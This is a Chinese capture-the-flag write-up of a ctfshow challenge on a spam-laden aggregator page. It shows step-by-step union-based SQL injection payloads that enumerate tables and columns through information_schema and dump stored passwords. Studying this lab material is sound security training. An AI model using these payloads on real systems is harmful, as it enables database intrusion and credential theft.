当前位置: 首页 > news >正文

无锡网站关键词推广北京医疗网站建设

无锡网站关键词推广,北京医疗网站建设,网站制作哪些分类,有哪个网站做ic//拼接sql语句查找指定ID用户 $sql "select username,password from ctfshow_user2 where username !flag and id ".$_GET[id]." limit 1;"; 联合查询 该题目与上一个题目不是同一个类型,该题目需要进行sql联合查询。 第一步:确…
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

联合查询

该题目与上一个题目不是同一个类型,该题目需要进行sql联合查询。

第一步:确定sql注入的类型。1' or 1=1 确定为字符型(根据上面的php代码也能确定)

第二步:使用order by确定列数 1' order by 3 --+

第三步:测试回显位:1' union select 1,2 --+

第四步:使用database(),查询数据库 1' union select 1, database() --+

第五步:查询表名

x union select 1,group_concat(table_name),x from information_schema.tables where table_schema=database() --+

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web" --+

第一个x代表是需要确定哪种注入类型。

第二个x代表是需要确定是有几个列,并且确定回显字段。

第六步:查询字段名:

x union select 1,group_concat(column_name),x from information_schema.columns where table_schema=database()&&table_name="查询到的表名" --+

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()&&table_name="ctfshow_user2" --+

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctfshow_web"&&table_name="ctfshow_user2" --+

两种方法均无法查询出字段名,因为语法出现问题。应该使用下列查询语句:加个括号

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database()&&table_name="ctfshow_user2") --+

仍然不正确,在语句中不需要数据库的信息。

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="ctfshow_user2") --+

所以最开始语句的问题是多加了数据库的信息:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name="ctfshow_user2" --+

第七步:查询字段值:

1' union select 1,group_concat(password) from ctfshow_user2 --+

1' union select 1,password from ctfshow_user2 --+

以上问题错误的原因:该题目只有一个数据库,因此在查询字段时不需要指定数据库名。

http://www.yayakq.cn/news/279636/

相关文章:

  • 怎么给别人做网站网站外贸推广引流系统
  • 禁止同ip网站查询做司法考试题目的网站
  • 学院的网站建设的意义网站开发分支结构
  • 网站做seo推广方案正规的网站制作哪个好
  • 中国万网icp网站备案专题贵州seo排名
  • 全国专业做美术网站的公司做推广网站的文章
  • 网站备案需要材料网站建设成本明细
  • 苏州建设网站教程安卓应用开发语言
  • 旅游网站设计思路毕业设计网站设计步骤
  • 自己怎么手机做网站青岛网上房地产网站
  • 学做网站用谁的书广告公司推广方案
  • 自贡网站设计php网站怎么做自适应
  • 长沙哪个公司做网站建设一个网站项目预算
  • 记事本做网站插图片想象力做网站
  • 襄阳网站推广优化技巧三角形景观绿化设计图
  • asp 做网站9 1短视频安装
  • 海南电子商务网站杭州网站制作公司网站
  • 网站的国际化 怎么做网片价格
  • 网站建设360网站推广平台
  • 找平面图的网站杭州市拱墅区建设局网站
  • 建站推广什么意思阿里云可以做电影网站
  • 营销型网站建设用途谷歌搜索指数查询
  • 青岛硅谷网站建设公司seo公司网站推广
  • 在线设计网站海报金坛网站开发
  • 塑胶加工 技术支持 东莞网站建设淄博网站建设至信网络
  • 上海网站建设索王道下拉wordpress女性模板
  • 太仓建设网站温州免费做网站
  • dede wap网站模板下载广州越秀区怎么样
  • a站在线观看人数在哪主题网站开发报告
  • 网站建站华为云男朋友是做网站的赚钱不